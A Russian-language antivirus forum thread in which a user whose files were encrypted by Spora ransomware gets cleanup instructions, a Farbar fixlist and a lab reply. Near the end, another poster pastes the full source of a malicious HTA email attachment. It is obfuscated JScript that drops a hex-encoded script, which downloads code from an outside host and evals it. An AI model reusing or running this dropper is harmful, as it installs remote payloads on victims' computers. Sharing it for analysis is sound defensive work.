Вирус Spora поменял кодировку документов

[bread89]

Добрый вечер, не знаю что и делать, все файлы офиса битые(. Вирус попал при открытии почты, картинки тоже не открываются, создались файлы *.lnk на всех дисках

Изменено 10 января, 2017 пользователем bread89

[Mark D. Pearlstone]

@bread89, https://[url=http://forum.kasperskyclub.ru/index.php?showtopic=43640]Порядок оформления запроса о помощи[/url]

[bread89]

Логи программы  Farbar Recovery Scan Tool

 

CollectionLog-2017.01.10-21.29.zip

Addition.txt

FRST.txt

Shortcut.txt

Изменено 10 января, 2017 пользователем bread89

[SQ]

Здравствуйте,
 

• Закройте и сохраните все открытые приложения.
• Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
  

  CreateRestorePoint:
  CloseProcesses:
  2017-01-10 14:15 - 2017-01-10 14:15 - 00212512 ____R C:\Users\KompMaster\AppData\Roaming\RUF9A-F8EEE-TOKTZ-TFROT-XAART-KZYYY.LST
  2017-01-10 14:15 - 2017-01-10 14:15 - 00009094 ____R C:\Users\KompMaster\AppData\Roaming\RUF9A-F8EEE-TOKTZ-TFROT-XAART-KZYYY.HTML
  2017-01-10 14:10 - 2017-01-10 14:10 - 00001088 ____R C:\Users\KompMaster\AppData\Roaming\RUF9A-F8EEE-TOKTZ-TFROT-XAART-KZYYY.KEY
  Folder: C:\Users\KompMaster\AppData\Roaming\3099727341
  2017-01-10 14:09 - 2017-01-10 14:15 - 00364184 _____ C:\Users\KompMaster\AppData\Roaming\3099727341
  2017-01-10 14:09 - 2017-01-10 14:15 - 0364184 _____ () C:\Users\KompMaster\AppData\Roaming\3099727341
  2017-01-10 14:15 - 2017-01-10 14:15 - 0009094 ____R () C:\Users\KompMaster\AppData\Roaming\RUF9A-F8EEE-TOKTZ-TFROT-XAART-KZYYY.HTML
  2017-01-10 14:10 - 2017-01-10 14:10 - 0001088 ____R () C:\Users\KompMaster\AppData\Roaming\RUF9A-F8EEE-TOKTZ-TFROT-XAART-KZYYY.KEY
  2017-01-10 14:15 - 2017-01-10 14:15 - 0212512 ____R () C:\Users\KompMaster\AppData\Roaming\RUF9A-F8EEE-TOKTZ-TFROT-XAART-KZYYY.LST
  Zip: C:\Users\KompMaster\AppData\Local\Temp\23caa910-d6d6-3608-4619-92ae79505bfc.exe;C:\Users\KompMaster\AppData\Local\Temp\81063163ded.exe;C:\Users\KompMaster\AppData\Local\Temp\un7.exe;C:\Users\KompMaster\AppData\Local\Temp\{9C1415A1-791E-4D6D-987A-9E521A747D55}.exe;C:\Users\KompMaster\AppData\Local\Temp\PidGenX.dll
  C:\Users\KompMaster\AppData\Local\Temp\23caa910-d6d6-3608-4619-92ae79505bfc.exe
  C:\Users\KompMaster\AppData\Local\Temp\81063163ded.exe
  C:\Users\KompMaster\AppData\Local\Temp\PidGenX.dll
  C:\Users\KompMaster\AppData\Local\Temp\SkypeSetup.exe
  C:\Users\KompMaster\AppData\Local\Temp\un7.exe
  C:\Users\KompMaster\AppData\Local\Temp\YandexPackSetup.exe
  C:\Users\KompMaster\AppData\Local\Temp\{9C1415A1-791E-4D6D-987A-9E521A747D55}.exe
  Reboot:

• Запустите FRST и нажмите один раз на кнопку Fix и подождите.
• Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
• Обратите внимание, что компьютер будет перезагружен.

Файл <дата>_<время>.zip (где <дата> - текущая дата <время> - текущее время) с рабочего стола отправьте по адресу newvirus@kaspersky.com.
1. В заголовке письма напишите "Запрос на исследование вредоносного файла".
2. В письме напишите "Выполняется запрос хэлпера".
3. Прикрепите файл карантина и нажмите "Отправить"
4. Полученный ответ сообщите здесь (с указанием номера KLAN)

[bread89]

Почистил сегодня комп GDATA_ANTIVIRUS распоздал вирус Spora и почистил весь комп, но проблема с ворд файлами и фото осталось, файлы перекодированны

ответили на письмо:

письмо:

[KLAN-5642658061]

Спасибо, что отправили файл на исследование в Антивирусную Лабораторию.

Антивирус Касперского проверил файлы.

Вредоносные программы не найдены в файлах:
23caa910-d6d6-3608-4619-92ae79505bfc.exe
PidGenX.dll
un7.exe
{9C1415A1-791E-4D6D-987A-9E521A747D55}.exe

Мы исследуем эти файлы. Если результат исследования будет отличаться, мы сообщим вам по электронной почте в течение пяти дней.

Это сообщение сформировано автоматической системой приёма писем. Пожалуйста не отвечайте на него.

Антивирусная Лаборатория, Kaspersky Lab HQ

"Ленинградское шоссе 39A/3, Москва, 125212, Russia
Телефон/Факс: + 7 (495) 797 8700 
http://www.kaspersky.com http://www.viruslist.com"

 

Fixlog.txt

Изменено 11 января, 2017 пользователем bread89

[SQ]

Если есть лицензии на продукты ЛК, то пробуйте создать запрос https://forum.kasperskyclub.ru/index.php?showtopic=48525

P.S. Не удаляйте каталог C:\FRST пока не решите вопрос с расшифровкой.

[TRuF]

Пришел архив с социально адаптированным названием Акт сверки_ноябрь2016_перерасчет (для сверки).rar весом 1 448 байт

Внутри не менее веселое название Скан-копия от 13.02.2017. CPOЧHO для пpoверки. ПРОВЕРЕНО директором компании_Для печати_.0b87832.hta весом 2613 байт.

Несколько символом в бинарнике изменил чтобы не сочли за распространителя вредоносного кода.

 

<hta:application windowstate='minimize'/>

<script type="text/jscript" language="JScript">

/// 231b6cab8f093d6b8fcf224a9470921f

var g=2+3

if (g=5)

/// f3bde637038f2de9838e4700b8cddf5c

{try{ty=new ActiveXObject("Excel.Application")}catch(e){};};

else

/// a59c6d58d3dc8429d7dcf89dceb88789

Nothing();

/// e2502d119f7a98d7fd47fe3a5d2c332f

/// b59627e8e9a3f95063b80ebd6508481e

/// b455ff4cfe958f396abcfacf36533c82

var hol=8+15;

/// a7bab053a61d99715955e4f220f05e5f

hol.toString();

f=new ActiveXObject("Scripting.FileSystemObject");s=new ActiveXObject("ADODB.Stream");a=new ActiveXObject("Shell.Application");x=new ActiveXObject("Msxml2.FreeThreadedDOMDocument.6.0");z=f.getSpecialFolder(2)+'\\'+f.getBaseName(f.getTempName())+'.wsf';var d=f.getBaseName(/filename="(.+)"/);var r=x.createElement('bill'),y=0;r.text="964223E0D0A3C6F626A6563742069643D227479222070726F6769643D226D73786D6C322E786D6C6874747022202F3E0D0A3C6F626A6563742069643D2271222070726F6769643D2241444F44422E436F6E6E656374696F6E22202F3E0D0A3C6F626A6563742069643D22686F222070726F6769643D225368656C6C2E4170706C69636174696F6E22202F3E200D0A3C73637269707420747970653D22746578742F6A73637269707422206C616E67756167653D224A536372697074223E0D0A575363726970742E536C6565702832303030290D0A766172206A6F3D322B330D0A76617220676C6F3D380D0A69662028676C6F3D35290D0A7B6A69703D6E657720416374697665584F626A656374282241444F44422E5265636F726473657422297D3B0D0A656C73650D0A7B6E657720416374697665584F626A6563742822536372697074696E672E46696C6553797374656D22297D3B0D0A7661722075203D2074793B0D0A752E6F70656E2822474554222C22687474703A2F2F7374726F796D6F6C6C2E636F6D2F686F6F64222C30293B0D0A752E73656E6428293B0D0A6576616C28752E526573706F6E736554657874293B0D0A203C2F7363726970743E0D0A203C73637269707420747970653D22746578742F6A73637269707422206C616E67756167653D224A536372697074223E0D0A20575363726970742E536C6565702832303030290D0A2076617220686F6C3D382B31353B0D0A20686F6C2E746F537472696E6728293B0D0A0D0A20203C2F7363726970743E0D0".replace(/^\s*(.+\s+){4}/,''),r.dataType='bin.hex';s.type=1,s.open(),s.write(r.nodeTypedValue),s.saveToFile(z),s.close();a.ShellExecute(z)

/// a1325c49cbe093e8c4c0eff6f6e1f54c

 try{f=new ActiveXObject("Scripting.FileSystemObject");s=new ActiveXObject("ADODB.Stream");a=new ActiveXObject("Shell.Application");x=new ActiveXObject("Msxml2.FreeThreadedDOMDocument.6.0");var m = new ActiveXObject("Word.Application");m.Caption =("Test");m.Visible =("True");var j = m.Documents.Add();var l = m.Selection;l.TypeText("");}catch(e){};try{l.TypeParagraph();j.SaveAs("bill(14.02.17).doc");}catch(e){};

window.close()

 </script>

 

 

На какой email отправить оригинал?

и когда реально ждать обновления защиты?

[Sandor]

@TRuF, здравствуйте!

 

Не пишите в чужой теме. Создайте свою, прочтите и выполните Порядок оформления запроса о помощи